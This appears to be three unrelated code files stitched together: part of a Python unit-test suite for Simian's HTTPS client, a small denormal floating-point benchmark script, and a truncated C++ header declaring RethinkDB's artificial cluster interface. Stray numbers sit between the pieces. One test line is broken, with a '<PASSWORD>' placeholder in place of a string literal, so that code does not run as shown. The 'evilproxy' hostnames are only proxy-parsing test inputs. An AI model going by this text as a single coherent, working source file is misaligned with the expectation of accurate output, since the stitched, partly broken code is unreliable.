_LoadHost().""" self.client._LoadHost('host') self.assertEqual(self.client.hostname, 'host') self.assertEqual(self.client.port, None) self.assertTrue(self.client.use_https) self.client._LoadHost('host', 12345) self.assertEqual(self.client.hostname, 'host') self.assertEqual(self.client.port, 12345) self.assertTrue(self.client.use_https) self.client._LoadHost('https://tsoh:54321') self.assertEqual(self.client.hostname, 'tsoh') self.assertEqual(self.client.port, 54321) self.assertTrue(self.client.use_https) self.client._LoadHost('https://tsoh:54321', 9999) self.assertEqual(self.client.hostname, 'tsoh') self.assertEqual(self.client.port, 54321) self.assertTrue(self.client.use_https) self.client._LoadHost('foo.bar:5555') self.assertEqual(self.client.hostname, 'foo.bar') 
self.assertEqual(self.client.port, 5555) self.assertTrue(self.client.use_https) self.client._LoadHost('http://nonsecurehost') self.assertEqual(self.client.hostname, 'nonsecurehost') self.assertEqual(self.client.port, None) self.assertFalse(self.client.use_https) self.client._LoadHost('https://dev1.latest.%s' % client.SERVER_HOSTNAME) self.assertEqual( self.client.hostname, 'dev1.latest.%s' % client.SERVER_HOSTNAME) self.assertEqual(self.client.port, None) self.assertTrue(self.client.use_https) self.client._LoadHost('http://dev2.latest.%s' % client.SERVER_HOSTNAME) self.assertEqual( self.client.hostname, 'dev2.latest.%s' % client.SERVER_HOSTNAME) self.assertEqual(self.client.port, None) self.assertFalse(self.client.use_https) self.client._LoadHost('http://nonsecurehost:1234') self.assertEqual(self.client.hostname, 'nonsecurehost') self.assertEqual(self.client.port, 1234) self.assertFalse(self.client.use_https) self.client._LoadHost(u'http://unicodehost') self.assertTrue(type(self.client.hostname) is str) self.assertEqual(self.client.hostname, 'unicodehost') self.client._LoadHost(u'http://unicodehost', proxy=u'http://evilproxy:9') self.assertTrue(type(self.client.hostname) is str) self.assertEqual(self.client.hostname, 'unicodehost') self.assertTrue(type(self.client.proxy_hostname) is str) self.assertEqual(self.client.proxy_hostname, 'evilproxy') self.assertEqual(self.client.proxy_port, 9) self.assertFalse(self.client.proxy_use_https) self.client._LoadHost(u'http://unicodehost', proxy=u'https://evilprxssl:8') self.assertTrue(type(self.client.hostname) is str) self.assertEqual(self.client.hostname, 'unicodehost') self.assertTrue(type(self.client.proxy_hostname) is str) self.assertEqual(self.client.proxy_hostname, 'evilprxssl') self.assertEqual(self.client.proxy_port, 8) self.assertTrue(self.client.proxy_use_https) def testSetCACertChain(self): """Test SetCACertChain().""" self.client.SetCACertChain('foo') self.assertEqual(self.client._ca_cert_chain, 'foo') def 
_TestConnect(self, test_client, hostname, port): """Test _Connect().""" m = mock.Mock() m.return_value = m test_client._ca_cert_chain = 'cert chain' use_https = ( (not test_client.proxy_hostname and test_client.use_https) or (test_client.proxy_hostname and test_client.proxy_use_https)) if use_https: self.stubs.Set(client, 'HTTPSMultiBodyConnection', m) else: self.stubs.Set(client, 'HTTPMultiBodyConnection', m) expected = [mock.call(hostname, port)] if use_https: expected.append(mock.call.SetCACertChain('cert chain')) expected.append(mock.call.connect()) test_client._Connect() m.assert_has_calls(expected) def testConnect(self): self._TestConnect(self.client, self.hostname, self.port) def testConnectWithProxy(self): test_client = client.HttpsClient(self.hostname, proxy='proxyhost:123') self._TestConnect(test_client, 'proxyhost', 123) def testGetResponseNoFile(self): """Test _GetResponse() storing body directly into response obj.""" headers = {'foo': 1} status = 200 body = 'howdy sir' body_len = len(body) response = mock.create_autospec(httplib.HTTPResponse) response.getheaders.return_value = headers response.read.side_effect = [body, None] response.status = status response.reason = 'OK' conn = mock.create_autospec(httplib.HTTPConnection) conn.getresponse.return_value = response r = self.client._GetResponse(conn) self.assertEqual(r.headers, headers) self.assertEqual(r.status, status) self.assertEqual(r.body, body) self.assertEqual(r.body_len, body_len) def testGetResponseOutputFile(self): """Test _GetResponse() sending the body to output_file.""" headers = {'foo': 1} status = 200 body = 'howdy sir' body_len = len(body) path = '/file' fs = fake_filesystem.FakeFilesystem() fs.CreateFile(path) fake_open = fake_filesystem.FakeFileOpen(fs) output_file = fake_open(path, 'w') response = mock.create_autospec(httplib.HTTPResponse) response.getheaders.return_value = headers response.read.side_effect = [body, None] response.status = status response.reason = 'Ok' conn = 
mock.create_autospec(httplib.HTTPSConnection) conn.getresponse.return_value = response r = self.client._GetResponse(conn, output_file=output_file) self.assertEqual(r.headers, headers) self.assertEqual(r.status, status) self.assertEqual(r.body, None) self.assertEqual(r.body_len, body_len) output_file.close() self.assertEqual(body, fake_open(path).read()) def testRequest(self): """Test _Request().""" method = 'zGET' url = u'/url' body1 = {'encodeme': 1} body1_encoded = client.urllib.urlencode(body1) body2 = 'leave this alone' headers = {'User-Agent': 'gzip'} conn = mock.create_autospec(httplib.HTTPConnection) self.client._Request(method, conn, url, body1, headers) self.client._Request(method, conn, url, body2, headers) conn.request.assert_has_calls([ mock.call(method, str(url), body=body1_encoded, headers=headers), mock.call(method, str(url), body=body2, headers=headers)]) def _TestDoRequestResponse(self, test_client, url, req_url): """Test _DoRequestResponse().""" method = 'zomg' conn = mock.create_autospec(httplib.HTTPConnection) body = 'body' headers = 'headers' output_file = None response = mock.create_autospec(httplib.HTTPResponse) response.status = 200 proxy_use_https = test_client.proxy_use_https with mock.patch.object(test_client, '_Connect', return_value=conn): request_mock = mock.create_autospec(test_client._Request) self.stubs.Set(test_client, '_Request', request_mock) get_response_mock = mock.Mock(return_value=response) self.stubs.Set(test_client, '_GetResponse', get_response_mock) self.assertEqual( response, test_client._DoRequestResponse( method, url, body, headers, output_file)) request_mock.assert_called_once_with( method, conn, req_url, body=body, headers=headers) get_response_mock.assert_called_once_with(conn, output_file=output_file) conn.assert_not_called() response.assert_not_called() with mock.patch.object( test_client, '_Connect', side_effect=client.httplib.HTTPException): self.assertRaises( client.HTTPError, test_client._DoRequestResponse, 
method, url, body, headers, output_file) def testDoRequestResponse(self): self._TestDoRequestResponse(self.client, '/url', '/url') def testDoHttpRequestResponseWithHttpProxy(self): """Test a https request via a http proxy.""" test_client = client.HttpsClient( 'http://%s' % self.hostname, proxy='proxyhost:123') req_url = 'http://' + self.hostname + '/url' self._TestDoRequestResponse(test_client, '/url', req_url) def testDoHttpsRequestResponseWithHttpProxy(self): """Test a https request via a http proxy.""" # default is https test_client = client.HttpsClient( self.hostname, proxy='http://proxyhost:124') req_url = 'https://' + self.hostname + '/url' self._TestDoRequestResponse(test_client, '/url', req_url) def testDoHttpRequestResponseWithHttpsProxy(self): """Test a https request via a http proxy.""" test_client = client.HttpsClient( 'http://%s' % self.hostname, proxy='https://proxyhost:125') req_url = 'http://' + self.hostname + '/url' self._TestDoRequestResponse(test_client, '/url', req_url) def testDoHttpsRequestResponseWithHttpsProxy(self): """Test a https request via a http proxy.""" # default is https test_client = client.HttpsClient( self.hostname, proxy='https://proxyhost:126') req_url = 'https://' + self.hostname + '/url' self._TestDoRequestResponse(test_client, '/url', req_url) def testDoWithInvalidMethod(self): """Test Do() with invalid method.""" self.assertRaises( NotImplementedError, self.client.Do, 'badmethod', '/url') @mock.patch.object(client.time, 'sleep') def testDo(self, mock_sleep): """Test Do() with correct arguments and no output_filename.""" method = 'GET' url = 'url' body = None headers = None output_file = None output_filename = None # HTTP 500 should retry. mock_response_fail = mock.create_autospec(httplib.HTTPResponse) mock_response_fail.status = 500 # HTTP 200 should succeed. 
mock_response = mock.create_autospec(httplib.HTTPResponse) mock_response.status = 200 with mock.patch.object( self.client, '_DoRequestResponse', side_effect=[ mock_response_fail, mock_response]) as mock_do_request_response: inorder_calls = mock.Mock() inorder_calls.attach_mock(mock_sleep, 'sleep') inorder_calls.attach_mock(mock_do_request_response, '_DoRequestResponse') do_request_response_call = mock.call._DoRequestResponse( method, url, body=body, headers={}, output_file=output_file) self.client.Do(method, url, body, headers, output_filename) inorder_calls.assert_has_calls([ mock.call.sleep(0), do_request_response_call, mock.call.sleep(5), do_request_response_call]) @mock.patch.object(client.time, 'sleep') def testDoWithRetryHttp500(self, mock_sleep): """Test Do() with a HTTP 500, thus a retry.""" method = 'GET' url = 'url' body = None headers = None output_file = None output_filename = None inorder_calls = mock.Mock() inorder_calls.attach_mock(mock_sleep, 'sleep') mock_response = mock.create_autospec(httplib.HTTPResponse) mock_response.status = 500 with mock.patch.object( self.client, '_DoRequestResponse', return_value=mock_response) as mock_do_request_response: inorder_calls.attach_mock(mock_do_request_response, '_DoRequestResponse') self.client.Do(method, url, body, headers, output_filename) expected = [] for i in xrange(0, client.DEFAULT_HTTP_ATTEMPTS): expected += [ mock.call.sleep(i * 5), mock.call._DoRequestResponse( method, url, body=body, headers={}, output_file=output_file)] inorder_calls.assert_has_calls(expected) @mock.patch.object(client.time, 'sleep') def testDoWithRetryHttpError(self, mock_sleep): """Test Do() with a HTTP 500, thus a retry, but ending with HTTPError.""" method = 'GET' url = 'url' body = None headers = None output_file = None output_filename = None inorder_calls = mock.Mock() inorder_calls.attach_mock(mock_sleep, 'sleep') mock_response = mock.create_autospec(httplib.HTTPResponse) mock_response.status = 500 with mock.patch.object( 
self.client, '_DoRequestResponse', side_effect=client.HTTPError) as mock_do_request_response: inorder_calls.attach_mock(mock_do_request_response, '_DoRequestResponse') self.assertRaises( client.HTTPError, self.client.Do, method, url, body, headers, output_filename) expected = [] for i in xrange(0, client.DEFAULT_HTTP_ATTEMPTS): expected += [ mock.call.sleep(i * 5), mock.call._DoRequestResponse( method, url, body=body, headers={}, output_file=output_file)] inorder_calls.assert_has_calls(expected) def testDoWithOutputFilename(self): """Test Do() where an output_filename is supplied.""" method = 'GET' url = 'url' body = None headers = {} output_file = mock.create_autospec(file) mock_open = mock.Mock(return_value=output_file) output_filename = '/tmpfile' mock_response = mock.create_autospec(httplib.HTTPResponse) mock_response.status = 200 with mock.patch.object( self.client, '_DoRequestResponse', return_value=mock_response) as mock_do_request_response: self.client.Do( method, url, body, headers, output_filename, _open=mock_open) mock_do_request_response.assert_called_once_with( method, url, body=body, headers={}, output_file=output_file) def testDoWithProxy(self): """Test Do() with a proxy specified.""" method = 'GET' url = 'url' proxy = 'proxyhost:123' # Working case. mock_response = mock.create_autospec(httplib.HTTPConnection) mock_response.status = 200 test_client = client.HttpsClient(self.hostname, proxy=proxy) with mock.patch.object( test_client, '_DoRequestResponse', return_value=mock_response) as mock_do_request_response: test_client.Do(method, url) mock_do_request_response.assert_called_once_with( method, url, body=None, headers={}, output_file=None) # No port case. proxy = 'proxyhost' self.assertRaises( client.Error, client.HttpsClient, self.hostname, proxy=proxy) # Bad port case. 
proxy = 'proxyhost:alpha' self.assertRaises( client.Error, client.HttpsClient, self.hostname, proxy=proxy) class HttpsAuthClientTest(basetest.TestCase): """Test HttpsAuthClient.""" def setUp(self): super(HttpsAuthClientTest, self).setUp() self.stubs = stubout.StubOutForTesting() self.hostname = 'hostname' self.port = None self.client = client.HttpsAuthClient(self.hostname) self.fs = fake_filesystem.FakeFilesystem() fake_os = fake_filesystem.FakeOsModule(self.fs) self.fake_open = fake_filesystem.FakeFileOpen(self.fs) self.stubs.Set(client, 'os', fake_os) def tearDown(self): super(HttpsAuthClientTest, self).tearDown() self.stubs.UnsetAll() @mock.patch.object(client.HttpsAuthClient, '_LoadRootCertChain') def testInit(self, _): """Test __init__().""" c = client.HttpsAuthClient(self.hostname) self.assertEqual(c._auth1, None) self.assertEqual(c._cookie_token, None) def testPlatformSetup(self): """Test PlatformSetup().""" with mock.patch.object(client.platform, 'system', return_value='Darwin'): self.client.facter_cache_path = 'x' self.client._PlatformSetup() self.assertEqual( self.client.facter_cache_path, self.client.FACTER_CACHE_OSX_PATH) with mock.patch.object(client.platform, 'system', return_value='other'): self.client.facter_cache_path = 'x' self.client._PlatformSetup() self.assertEqual( self.client.facter_cache_path, self.client.FACTER_CACHE_DEFAULT_PATH) def testGetFacter(self): """Test GetFacter().""" st_dt = client.datetime.datetime.now() facter = {'foo': 'bar', 'one': '1'} file_path = '/x' lines = [ 'foo => bar', 'one => 1', 'I_am_invalid', ] fake_file = self.fs.CreateFile(file_path, contents='\n'.join(lines)) fake_file.st_uid = 0 fake_file.st_mtime = int(st_dt.strftime('%s')) self.client.facter_cache_path = file_path with mock.patch.object(client.os, 'geteuid', return_value=0): self.assertEqual(facter, self.client.GetFacter(open_fn=self.fake_open)) def testGetFacterWhenInsecureFileForRoot(self): """Test GetFacter().""" file_path = '/x' 
self.client.facter_cache_path = file_path fake_file = self.fs.CreateFile(file_path) fake_file.st_uid = 100 # root with mock.patch.object(client.os, 'geteuid', return_value=0): fake_open = mock.Mock() self.assertEqual({}, self.client.GetFacter(open_fn=fake_open)) fake_open.assert_not_called() # same regular user with mock.patch.object(client.os, 'geteuid', return_value=200): fake_open = mock.Mock() self.assertEqual({}, self.client.GetFacter(open_fn=fake_open)) fake_open.assert_not_called() @mock.patch.object(client.os.path, 'isfile', return_value=False) def testGetFacterWhenCacheDoesNotExist(self, _): """Test GetFacter() with a nonexistent cache file.""" self.client.facter_cache_path = '/x' self.assertEqual({}, self.client.GetFacter()) def testGetFacterWhenCachePathIsNone(self): """Test GetFacter() with facter_cache_path is None.""" self.client.facter_cache_path = None self.assertEqual({}, self.client.GetFacter()) def testGetAuthTokenFromHeadersSuccess(self): token = <PASSWORD>;' % auth.AUTH_TOKEN_COOKIE result = self.client._GetAuthTokenFromHeaders( {'set-cookie': 'other=value;,%s,something=else;' % token}) self.assertEqual(token, result) def testGetAuthTokenFromHeadersMissingHeader(self): self.assertRaises( client.SimianClientError, self.client._GetAuthTokenFromHeaders, {'set-cookie': ''}) class SimianClientTest(basetest.TestCase): """Test SimianClient class.""" def setUp(self): self.hostname = 'hostname' self.port = None self.client = client.SimianClient(self.hostname) def testInitWithoutHostname(self): """Test __init__() without a hostname passed.""" user = 'foouser' with mock.patch.object( client.SimianClient, '_GetLoggedOnUser', return_value=user): clienttmp = client.SimianClient() self.assertEqual(clienttmp.hostname, client.SERVER_HOSTNAME) self.assertEqual(clienttmp._user, user) def testInitWithHostname(self): """Test __init__() with a hostname passed.""" user = 'foouser' with mock.patch.object( client.SimianClient, '_GetLoggedOnUser', return_value=user): 
clienttmp = client.SimianClient('foo') self.assertEqual(clienttmp.hostname, 'foo') self.assertEqual(clienttmp._user, user) def testInitAsRoot(self): """Test __init__() with a hostname passed.""" with mock.patch.object( client.SimianClient, '_GetLoggedOnUser', return_value='root'): self.assertRaises(client.SimianClientError, client.SimianClient) def testIsDefaultHostClient(self): """Test IsDefaultHostClient().""" self.client._default_hostname = 'foo' self.assertEqual(self.client.IsDefaultHostClient(), 'foo') def testSimianRequest(self): """Test _SimianRequest().""" method = 'zGET' url = '/url' headers = {'foo': 'bar'} output_filename = None good_response = client.Response(status=200, body='hello there') with mock.patch.object( self.client, 'Do', return_value=good_response) as do_mock: self.assertEqual( good_response.body, self.client._SimianRequest(method, url, headers=headers)) do_mock.assert_called_once_with( method, url, body=None, headers=headers, output_filename=output_filename) def testSimianRequestWithError(self): """Test _SimianRequest() with an error status returned.""" method = 'zGET' url = '/url' headers = {'foo': 'bar'} output_filename = None error_response = client.Response(status=401, body='fooerror') with mock.patch.object( self.client, 'Do', return_value=error_response) as do_mock: self.assertRaises( client.SimianServerError, self.client._SimianRequest, method, url, headers=headers) do_mock.assert_called_once_with( method, url, body=None, headers=headers, output_filename=output_filename) def GenericStubTestAndReturn( self, method, method_return, method_args, stub_method_name, stub_method_return, *stub_args, **stub_kwargs): """Helper test method. 
Args: method: method, to invoke in the test method_return: any, value to expect from method method_args: list, arguments to send to method during test stub_method_name: str, method name to stub out in SimianClient class stub_method_return: any, value to return from stubbed method call stub_args: list, args to expect when calling stub_method_name stub_kwargs: dict, kwargs to expect when calling stub_method_name """ with mock.patch.object( self.client, stub_method_name, return_value=stub_method_return) as m: got_rv = method(*method_args) self.assertEqual(got_rv, method_return) m.assert_called_once_with(*stub_args, **stub_kwargs) def GenericStubTest( self, method, method_args, stub_method_name, *stub_args, **stub_kwargs): """Helper test method. Args: method: method, to invoke in the test method_args: list, arguments to send to method during test stub_method_name: str, method name to stub out in SimianClient class stub_args: list, args to expect when calling stub_method_name stub_kwargs: dict, kwargs to expect when calling stub_method_name Returns: string, 'returnval' """ rv = 'returnval' return self.GenericStubTestAndReturn( method, rv, method_args, stub_method_name, rv, *stub_args, **stub_kwargs) def testGetCatalog(self): """Test GetCatalog().""" name = 'name' self.GenericStubTest( self.client.GetCatalog, [name], '_SimianRequest', 'GET', '/catalog/%s' % name) def testGetManifest(self): """Test GetManifest().""" name = 'name' self.GenericStubTest( self.client.GetManifest, [name], '_SimianRequest', 'GET', '/manifest/%s' % name) def testGetPackage(self): """Test GetPackage().""" name = 'name' self.GenericStubTest( self.client.GetPackage, [name], '_SimianRequest', 'GET', '/pkgs/%s' % name, output_filename=None) def testGetPackageInfo(self): """Test GetPackageInfo().""" filename = 'name.dmg' response = mock.create_autospec(httplib.HTTPResponse) response.body = 'hello' self.GenericStubTestAndReturn( self.client.GetPackageInfo, 'hello', [filename], '_SimianRequest', 
response, 'GET', '/pkgsinfo/%s' % filename, full_response=True) def testGetPackageInfoWhenHash(self): """Test GetPackageInfo().""" filename = 'name.dmg' response = mock.create_autospec(httplib.HTTPResponse) response.body = 'body' response.headers = {'x-pkgsinfo-hash': 'hash'} self.GenericStubTestAndReturn( self.client.GetPackageInfo, ('hash', 'body'), [filename, True], '_SimianRequest', response, 'GET', '/pkgsinfo/%s?hash=1' % filename, full_response=True) def testDownloadPackage(self): """Test DownloadPackage().""" filename = 'foo' self.GenericStubTest( self.client.DownloadPackage, [filename], '_SimianRequest', 'GET', '/pkgs/%s' % filename, output_filename=filename) def testPostReport(self): """Test PostReport().""" report_type = 'foo' params = {'bar': 1} url = '/reports' body = '_report_type=%s&%s' % ( report_type, client.urllib.urlencode(params, doseq=True)) self.GenericStubTest( self.client.PostReport, [report_type, params], '_SimianRequest', 'POST', url, body) def testPostReportWhenFeedback(self): """Test PostReport().""" report_type = 'foo' params = {'bar': 1} url = '/reports' body = '_report_type=%s&%s&_feedback=1' % ( report_type, client.urllib.urlencode(params, doseq=True)) self.GenericStubTest( self.client.PostReport, [report_type, params, True], '_SimianRequest', 'POST', url, body) def testPostReportBody(self): """Test PostReportBody().""" url = '/reports' body = 'foo' self.GenericStubTest( self.client.PostReportBody, [body], '_SimianRequest', 'POST', url, body) def testPostReportBodyWhenFeedback(self): """Test PostReportBody().""" url = '/reports' body = 'foo' body_with_feedback = 'foo&_feedback=1' self.GenericStubTest( self.client.PostReportBody, [body, True], '_SimianRequest', 'POST', url, body_with_feedback) @mock.patch.object(client.os.path, 'isfile', return_value=True) def testUploadFile(self, _): """Test UploadFile().""" file_type = 'log' file_name = 'file.log' file_path = 'path/to/' + file_name url = '/uploadfile/%s/%s' % (file_type, file_name) 
mock_file = mock.create_autospec(file) mock_open = mock.Mock(return_value=mock_file) with mock.patch.object(self.client, 'Do') as mock_do: self.client.UploadFile(file_path, file_type, _open=mock_open) mock_do.assert_called_once_with('PUT', url, mock_file) @mock.patch.object(client.logging, 'error', autospec=True) @mock.patch.object(client.os.path, 'isfile', return_value=False) def testUploadFileWhenLogNotFound(self, mock_isfile, mock_logging_error): """Test UploadFile() when the file is not found.""" file_path = 'path/to/file.log' self.client.UploadFile(file_path, 'foo-file-type') mock_logging_error.assert_called_once_with( 'UploadFile file not found: %s', file_path) mock_isfile.assert_called_once_with(file_path) class SimianAuthClientTest(basetest.TestCase): """Test SimianAuthClient class.""" def setUp(self): super(SimianAuthClientTest, self).setUp() self.pac = client.SimianAuthClient() def testGetAuthToken(self): """Test GetAuthToken().""" with mock.patch.object(self.pac, 'DoSimianAuth'): self.pac._cookie_token = 'token' self.assertEqual(self.pac.GetAuthToken(), 'token') def testLogoutAuthToken(self): """Test LogoutAuthToken().""" url = '/auth?logout=True' with mock.patch.object(self.pac, '_SimianRequest', return_value='ok'): self.assertTrue(self.pac.LogoutAuthToken()) self.pac._SimianRequest.assert_called_once_with('GET', url) def testLogoutAuthTokenWhenFail(self): """Test LogoutAuthToken().""" url = '/auth?logout=True' with mock.patch.object( self.pac, '_SimianRequest', side_effect=client.SimianServerError): self.assertFalse(self.pac.LogoutAuthToken()) self.pac._SimianRequest.assert_called_once_with('GET', url) logging.basicConfig(filename='/dev/null') def main(unused_argv): basetest.main() if __name__ == '__main__': app.run()
16,683
2,434
# file: floating-point/denormals.py
# (was a fused "<filename>" dataset marker, which is invalid Python; kept as a comment)
"""Benchmark and plot the runtime cost of floating-point inputs.

Runs the project's ``benchmark`` helper over a grid of (Flush, Value)
settings and shows the timings as a bar plot.  The "Flush" axis is
presumably a flush-denormals-to-zero toggle and the near-zero "Value"
entries are the ones expected to produce subnormals -- TODO confirm
against the ``benchmark`` implementation in ``utils``.
"""
import os
import sys

import matplotlib.pyplot as plt
import seaborn

# Make the repository root importable so the top-level `utils` module
# (which provides `benchmark`) can be found when this script is run
# directly from its subdirectory.
ROOT = os.path.realpath(os.path.join(os.path.dirname(__file__), "../"))
sys.path.append(ROOT)

from utils import benchmark

# Benchmark grid: each (name, values) pair is one axis of the sweep.
# Values are passed as strings; `benchmark` is responsible for parsing.
data = [
    ("Flush", [0, 1]),
    ("Value", ["0.3", "0.2", "0.1", "0", "1", "10"]),
]

# pin_to_cpu reduces scheduling noise in the timing measurements.
frame = benchmark(data, pin_to_cpu=True)

# One bar per Value, grouped by the Flush setting.
ax = seaborn.barplot(data=frame, x="Value", y="Time", hue="Flush")
ax.set(ylabel="Time [ms]")
plt.show()
201
21,684
// gh_stars: 1000+  (dataset metadata marker, preserved as a comment so the header stays valid C++)
*/

// Interface layer that serves RethinkDB's artificial "system" tables (the
// special `rethinkdb` database).  Requests that do not target that database
// are delegated to the next interface in the chain, installed via
// set_next_reql_cluster_interface().
class artificial_reql_cluster_interface_t :
    public reql_cluster_interface_t,
    public home_thread_mixin_t {
public:
    // Fixed id and name of the special system database served by this layer.
    static const uuid_u database_id;
    static const name_string_t database_name;

    artificial_reql_cluster_interface_t(
        std::shared_ptr<semilattice_readwrite_view_t<auth_semilattice_metadata_t>>
            auth_semilattice_view,
        rdb_context_t *rdb_context);

    /* Database-level operations.  Each returns true on success; on failure
    it returns false and fills `*error_out`. */
    bool db_create(
            auth::user_context_t const &user_context,
            const name_string_t &name,
            signal_t *interruptor,
            ql::datum_t *result_out,
            admin_err_t *error_out);
    bool db_drop(
            auth::user_context_t const &user_context,
            const name_string_t &name,
            signal_t *interruptor,
            ql::datum_t *result_out,
            admin_err_t *error_out);
    bool db_list(
            signal_t *interruptor,
            std::set<name_string_t> *names_out,
            admin_err_t *error_out);
    bool db_find(const name_string_t &name,
            signal_t *interruptor,
            counted_t<const ql::db_t> *db_out,
            admin_err_t *error_out);
    bool db_config(
            auth::user_context_t const &user_context,
            const counted_t<const ql::db_t> &db,
            ql::backtrace_id_t bt,
            ql::env_t *env,
            scoped_ptr_t<ql::val_t> *selection_out,
            admin_err_t *error_out);

    /* Table-level operations. */
    bool table_create(
            auth::user_context_t const &user_context,
            const name_string_t &name,
            counted_t<const ql::db_t> db,
            const table_generate_config_params_t &config_params,
            const std::string &primary_key,
            write_durability_t durability,
            signal_t *interruptor,
            ql::datum_t *result_out,
            admin_err_t *error_out);
    bool table_drop(
            auth::user_context_t const &user_context,
            const name_string_t &name,
            counted_t<const ql::db_t> db,
            signal_t *interruptor,
            ql::datum_t *result_out,
            admin_err_t *error_out);
    bool table_list(counted_t<const ql::db_t> db,
            signal_t *interruptor,
            std::set<name_string_t> *names_out,
            admin_err_t *error_out);
    bool table_find(const name_string_t &name,
            counted_t<const ql::db_t> db,
            optional<admin_identifier_format_t> identifier_format,
            signal_t *interruptor,
            counted_t<base_table_t> *table_out,
            admin_err_t *error_out);
    bool table_estimate_doc_counts(
            auth::user_context_t const &user_context,
            counted_t<const ql::db_t> db,
            const name_string_t &name,
            ql::env_t *env,
            std::vector<int64_t> *doc_counts_out,
            admin_err_t *error_out);
    bool table_config(
            auth::user_context_t const &user_context,
            counted_t<const ql::db_t> db,
            const name_string_t &name,
            ql::backtrace_id_t bt,
            ql::env_t *env,
            scoped_ptr_t<ql::val_t> *selection_out,
            admin_err_t *error_out);
    bool table_status(
            counted_t<const ql::db_t> db,
            const name_string_t &name,
            ql::backtrace_id_t bt,
            ql::env_t *env,
            scoped_ptr_t<ql::val_t> *selection_out,
            admin_err_t *error_out);

    /* Readiness waiting. */
    bool table_wait(
            counted_t<const ql::db_t> db,
            const name_string_t &name,
            table_readiness_t readiness,
            signal_t *interruptor,
            ql::datum_t *result_out,
            admin_err_t *error_out);
    bool db_wait(
            counted_t<const ql::db_t> db,
            table_readiness_t readiness,
            signal_t *interruptor,
            ql::datum_t *result_out,
            admin_err_t *error_out);

    /* Reconfiguration / repair / rebalance. */
    bool table_reconfigure(
            auth::user_context_t const &user_context,
            counted_t<const ql::db_t> db,
            const name_string_t &name,
            const table_generate_config_params_t &params,
            bool dry_run,
            signal_t *interruptor,
            ql::datum_t *result_out,
            admin_err_t *error_out);
    bool db_reconfigure(
            auth::user_context_t const &user_context,
            counted_t<const ql::db_t> db,
            const table_generate_config_params_t &params,
            bool dry_run,
            signal_t *interruptor,
            ql::datum_t *result_out,
            admin_err_t *error_out);
    bool table_emergency_repair(
            auth::user_context_t const &user_context,
            counted_t<const ql::db_t> db,
            const name_string_t &name,
            emergency_repair_mode_t,
            bool dry_run,
            signal_t *interruptor,
            ql::datum_t *result_out,
            admin_err_t *error_out);
    bool table_rebalance(
            auth::user_context_t const &user_context,
            counted_t<const ql::db_t> db,
            const name_string_t &name,
            signal_t *interruptor,
            ql::datum_t *result_out,
            admin_err_t *error_out);
    bool db_rebalance(
            auth::user_context_t const &user_context,
            counted_t<const ql::db_t> db,
            signal_t *interruptor,
            ql::datum_t *result_out,
            admin_err_t *error_out);

    /* Permission grants at global / database / table scope. */
    bool grant_global(
            auth::user_context_t const &user_context,
            auth::username_t username,
            ql::datum_t permissions,
            signal_t *interruptor,
            ql::datum_t *result_out,
            admin_err_t *error_out);
    bool grant_database(
            auth::user_context_t const &user_context,
            database_id_t const &database_id,
            auth::username_t username,
            ql::datum_t permissions,
            signal_t *interruptor,
            ql::datum_t *result_out,
            admin_err_t *error_out);
    bool grant_table(
            auth::user_context_t const &user_context,
            database_id_t const &database_id,
            namespace_id_t const &table_id,
            auth::username_t username,
            ql::datum_t permissions,
            signal_t *interruptor,
            ql::datum_t *result_out,
            admin_err_t *error_out);

    /* Write hooks. */
    bool set_write_hook(
            auth::user_context_t const &user_context,
            counted_t<const ql::db_t> db,
            const name_string_t &table,
            const optional<write_hook_config_t> &config,
            signal_t *interruptor,
            admin_err_t *error_out);
    bool get_write_hook(
            auth::user_context_t const &user_context,
            counted_t<const ql::db_t> db,
            const name_string_t &table,
            signal_t *interruptor,
            ql::datum_t *write_hook_datum_out,
            admin_err_t *error_out);

    /* Secondary indexes. */
    bool sindex_create(
            auth::user_context_t const &user_context,
            counted_t<const ql::db_t> db,
            const name_string_t &table,
            const std::string &name,
            const sindex_config_t &config,
            signal_t *interruptor,
            admin_err_t *error_out);
    bool sindex_drop(
            auth::user_context_t const &user_context,
            counted_t<const ql::db_t> db,
            const name_string_t &table,
            const std::string &name,
            signal_t *interruptor,
            admin_err_t *error_out);
    bool sindex_rename(
            auth::user_context_t const &user_context,
            counted_t<const ql::db_t> db,
            const name_string_t &table,
            const std::string &name,
            const std::string &new_name,
            bool overwrite,
            signal_t *interruptor,
            admin_err_t *error_out);
    bool sindex_list(
            counted_t<const ql::db_t> db,
            const name_string_t &table,
            signal_t *interruptor,
            admin_err_t *error_out,
            std::map<std::string, std::pair<sindex_config_t, sindex_status_t> >
                *configs_and_statuses_out);

    // Installs the interface that handles everything outside the artificial
    // database (the delegation target checked by next_or_error()).
    void set_next_reql_cluster_interface(reql_cluster_interface_t *next);

    // Looks up the backend serving one artificial table.  The map stores a
    // pair of backends per table name; which element is returned is selected
    // by the admin_identifier_format_t argument.
    artificial_table_backend_t *get_table_backend(
            name_string_t const &,
            admin_identifier_format_t) const;

    using table_backends_map_t = std::map<
        name_string_t,
        std::pair<artificial_table_backend_t *, artificial_table_backend_t *>>;

    table_backends_map_t *get_table_backends_map_mutable();
    table_backends_map_t const &get_table_backends_map() const;

private:
    // Fails with an error when no next interface has been installed.
    bool next_or_error(admin_err_t *error_out) const;

    table_backends_map_t m_table_backends;
    std::shared_ptr<semilattice_readwrite_view_t<auth_semilattice_metadata_t>>
        m_auth_semilattice_view;
    rdb_context_t *m_rdb_context;
    // Delegation target for non-artificial-database requests.
    reql_cluster_interface_t *m_next;
};

// Owns the concrete artificial-table backends and registers each of them in
// the artificial interface's backend map for the lifetime of this object
// (registration is undone automatically by the map_insertion_sentry_t
// members).  Backends declared as arrays of two appear to hold one variant
// per admin_identifier_format_t — confirm against the .cc file.
class artificial_reql_cluster_backends_t {
public:
    artificial_reql_cluster_backends_t(
        artificial_reql_cluster_interface_t *artificial_reql_cluster_interface,
        real_reql_cluster_interface_t *real_reql_cluster_interface,
        std::shared_ptr<semilattice_readwrite_view_t<auth_semilattice_metadata_t>>
            auth_semilattice_view,
        std::shared_ptr<semilattice_readwrite_view_t<cluster_semilattice_metadata_t>>
            cluster_semilattice_view,
        std::shared_ptr<semilattice_readwrite_view_t<heartbeat_semilattice_metadata_t>>
            heartbeat_semilattice_view,
        clone_ptr_t<watchable_t<change_tracking_map_t<
            peer_id_t, cluster_directory_metadata_t>>> directory_view,
        watchable_map_t<peer_id_t, cluster_directory_metadata_t> *directory_map_view,
        table_meta_client_t *table_meta_client,
        server_config_client_t *server_config_client,
        mailbox_manager_t *mailbox_manager,
        rdb_context_t *rdb_context,
        lifetime_t<name_resolver_t const &> name_resolver);

private:
    // Sentry that inserts a backend pair into the interface's map on
    // construction and removes it on destruction.
